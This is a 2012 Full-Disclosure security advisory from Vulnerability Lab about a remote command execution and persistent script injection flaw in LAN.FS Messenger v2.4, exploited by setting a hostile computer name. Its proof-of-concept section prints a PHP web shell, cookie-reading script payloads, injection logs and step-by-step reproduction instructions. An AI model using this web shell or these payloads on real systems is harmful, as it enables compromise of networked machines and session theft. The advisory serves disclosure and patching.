[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] LAN.FS Messenger Software v2.4 - Command Execution Vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] LAN.FS Messenger Software v2.4 - Command Execution Vulnerability
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Tue, 20 Nov 2012 04:13:30 +0100
Title:
======
LAN.FS Messenger v2.4 - Command Execution Vulnerability
Date:
=====
2012-11-14
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=760
VL-ID:
=====
760
Common Vulnerability Scoring System:
====================================
8.2
Introduction:
=============
Lan.FS is a very quick, small and compact freeware networktool (for
non-commercial use only) for
Windows 2000/XP/2003/Vista & Windows 7. It is easy to handle for beginners and
provides various
functions for experts, too. Some features are:
Messenger with animated emoticons
Filetransfer service with statusdisplay
Remote Desktop functions to telecommand other computers in your network
Remote Shell function for access to the systemprompt of other computers in
your network.
Access to the whole filesystem of other computers
Windows commands (reboot, shutdown, user switch, run) on other computers
These functions are provided in your Local Area Network. Innovative aspects
concerning networkprograms are:
Lan.FS is ready for operation directly after finishing installation.
You do not need specialised knowledge about networks and
networkadministration
Lan.FS does not feature needless functions: You decide what to do.
Lan.FS works Windows-Workinggroups independent
Lan.FS works in WLAN networks (even if they are not absolutely stable)
Lan.FS provides a substantial support and trouble shooting
Lan.FS is Vista capable
(Copy of the Vendor Homepage: http://www.lan-fs.de/ )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered a command execution
vulnerability in the official LAN.FS v2.4 Messenger Software.
Report-Timeline:
================
2012-11-12: Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Remote
Severity:
=========
Critical
Details:
========
A command execution vulnerability is detected in the official LAN.FS v2.4
Messenger Software. The vulnerability allows an remote attacker
without user inter action to execute own system specific codes to compromise
the connected client system in the lan. The command execution
vulnerability is located in the Netzwerkeinstellungen - Administration
(Computer editieren, add & co.) > Computersettings (Computereinstellungen)
module with the bound vulnerability Computername software input field. Remote
attackers can change the own computername to execute malicious system
commands or script code attacks against the connected client via Messenger
Service (Nachrichtendienst). The windows path system commands/request or
the malicious injected script code will be directly executed out of the
Nachrichtendienst web context. Successful exploitation of the vulnerability
results in system compromise via command injection/execution, persistent script
code injections, persistent software context manipulation, external
malware loads or malicious external redirects. Exploitation of the
vulnerability requires a connected conversation but no direct user inter
action.
The commands or script code will be executed when the message is processing to
arrive.
Vulnerable Software Section(s):
[+] Local Area Network - Computer
Details
Vulnerable Software Module(s):
[+] Computtersettings
Vulnerable Software Parameter(s):
[+] Computername
Affected Software Module(s):
[+] Nachrichtendienst (Messenger
Service)
Proof of Concept:
=================
The software validation vulnerability can be exploited by remote attacker
without required user inter action or application user account.
For demonstration or reproduce ...
PoC: Command Execution or Injection (Path, Files & CMD)
%20../'+C:\ProgramData\Lan.FS\
%20../'+C:\ProgramData\Lan.FS\Profile\
%20../'+C:\Program Files (x86)\Lan.FS
<HTML><BODY>
<FORM METHOD="GET" NAME="Message" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>
Review: Command Execution - Messenger (Windows7) Logs
<html><body style="background-image:url(%20../'+C:\ProgramData\Lan.FS\Profile\);
<html><body style="background-image:url(%20../'+C:\ProgramData\Lan.FS\Profile\);
<html><body style="background-image:url(%20../'+C:\Program Files (x86)\Lan.FS);
PoC: Script Code Inject
>“<iframe src=http://vuln-lab.com>>
"><iframe src=vuln-lab.com onload=alert("VL") <>
>"<script>alert(document.cookie)</script><div style="1
Review: Script Code Inject - Messenger (Windows7) Logs
<html><body
style="background-image:url(C:\ProgramData\Lan.FS\Profile\Emoticons\background.bmp);background-repeat:no-repeat;
background-attachment:fixed; background-position:bottom
right;"></body></html><div style="font-family: Verdana; font-size: 10px;
color: #0000ff"><b>>“<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA
SYSTEMSETTINGS!]> (20:35:38):</b></div><div style="font-family: Verdana;
font-size: 10px; color: #000000">hi<br>
<br></div><div style="font-family: Verdana; font-size: 10px;
color: #ff0000"><b>>“<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA
SYSTEMSETTINGS!]> (20:35:46):</b></div><div style="font-family:
Verdana; font-size: 10px; color: #000000">hi<br>
<br></div><div style="font-family:
Verdana; font-size: 10px; color: #0000ff"><b>>"<[PERSISTENT INJECTED SCRIPT
CODE AS HOSTNAME VIA SYSTEMSETTINGS!]><div style="1
>"<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA SYSTEMSETTINGS!])</script>
<div style="1 (20:36:27):</b></div><div style="font-family: Verdana; font-size:
10px; color: #000000">hi<br>
<br></div><div style="font-family:
Verdana; font-size: 10px; color:
#ff0000"><b>>"<script>alert(document.cookie)</script><div style="1
>"<script>alert(document.cookie)</script>
<div style="1 (20:36:29):</b></div><div style="font-family: Verdana; font-size:
10px; color: #000000">hi<br>
<br></div><div style="font-family:
Verdana; font-size: 10px; color:
#0000ff"><b>>"<script>alert(document.cookie)</script><div style="1
>"<script>alert(document.cookie)</script>
<div style="1 (20:36:33):</b></div><div style="font-family: Verdana; font-size:
10px; color: #000000">>"<script>alert(document.cookie)</script>
<div style="1<br></div><div style="font-family: Verdana; font-size: 10px;
color: #ff0000"><b>>"<script>alert(document.cookie)
</script><div style="1 >"<script>alert(document.cookie)</script><div style="1
(20:36:34):</b></div><div style="font-family: Verdana; font-size:
10px; color: #000000">>"<script>alert(document.cookie)</script><div
style="1<br></div><div style="font-family: Verdana;
font-size: 10px; color:
#0000ff"><b>>"<script>alert(document.cookie)</script><div style="1
>"<script>alert(document.cookie)</script><div style="1
(20:36:41):</b></div><div style="font-family: Verdana; font-size: 10px; color:
#000000">yea<br></div><div style="font-family: Verdana; font-size:
10px; color: #ff0000"><b>>"<script>alert(document.cookie)</script><div style="1
>"<script>alert(document.cookie)</script>
<div style="1 (20:36:42):</b></div><div style="font-family: Verdana; font-size:
10px; color: #000000">yea<br></div><div style="font-family:
Verdana; font-size: 10px; color:
#0000ff"><b>>"<script>alert(document.cookie)</script><div style="1
>"<script>alert(document.cookie)</script>
<div style="1
(20:36:49):</b></div><div style="font-family: Verdana; font-size: 10px; color:
#000000">tha boss :D<br></div>
<div style="font-family: Verdana; font-size: 10px; color:
#ff0000"><b>>"<script>alert(document.cookie)</script><div style="1
>"<script>alert(document.cookie)</script><div style="1
>(20:36:50):</b></div><div style="font-family: Verdana; font-size: 10px;
color: #000000">tha boss :D<br></div>
Manually reproduce ...
1. Install the Software LAN.FS 2.4.x and start LAN.FS 2.4.x
2. First we go to Systemsettings in our windows7 system and change our
computername/hostname to malicious system path command or malicious script
code. Save!
3. Change the hostname in Netzwerkeinstellungen> Administration>
Computersettings to the own values with the system path command or script code
(<2.). Save!
4. Update Settings & connect the Nachrichtendient to your target system
5. Send a random message to the victim via lan.fs messenger
6. The vulnerable hostname in the message header can execute local file
requests, execute files and path commands or execute persistent malicious
script codes
7. The command or script code will be executed when the messager is processing
to display the arrived message of the attacker. No user inter action required!
Solution:
=========
The vulnerability can be patched by parsing the hostname (computername) input
field.
To parse also the hostname web context in the messenger software listing.
Risk:
=====
The security risk of the remote command execution vulnerability is estimated as
high(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@xxxxxxxxxxxxxxxxxxxxx)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any
warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor
licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.vulnerability-lab.com/register
Contact: admin@xxxxxxxxxxxxxxxxxxxxx - support@xxxxxxxxxxxxxxxxxxxxx
- research@xxxxxxxxxxxxxxxxxxxxx
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com
- news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@xxxxxxxxxxxxxxxxxxxxx or
support@xxxxxxxxxxxxxxxxxxxxx) to get a permission.
Copyright © 2012 | Vulnerability
Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/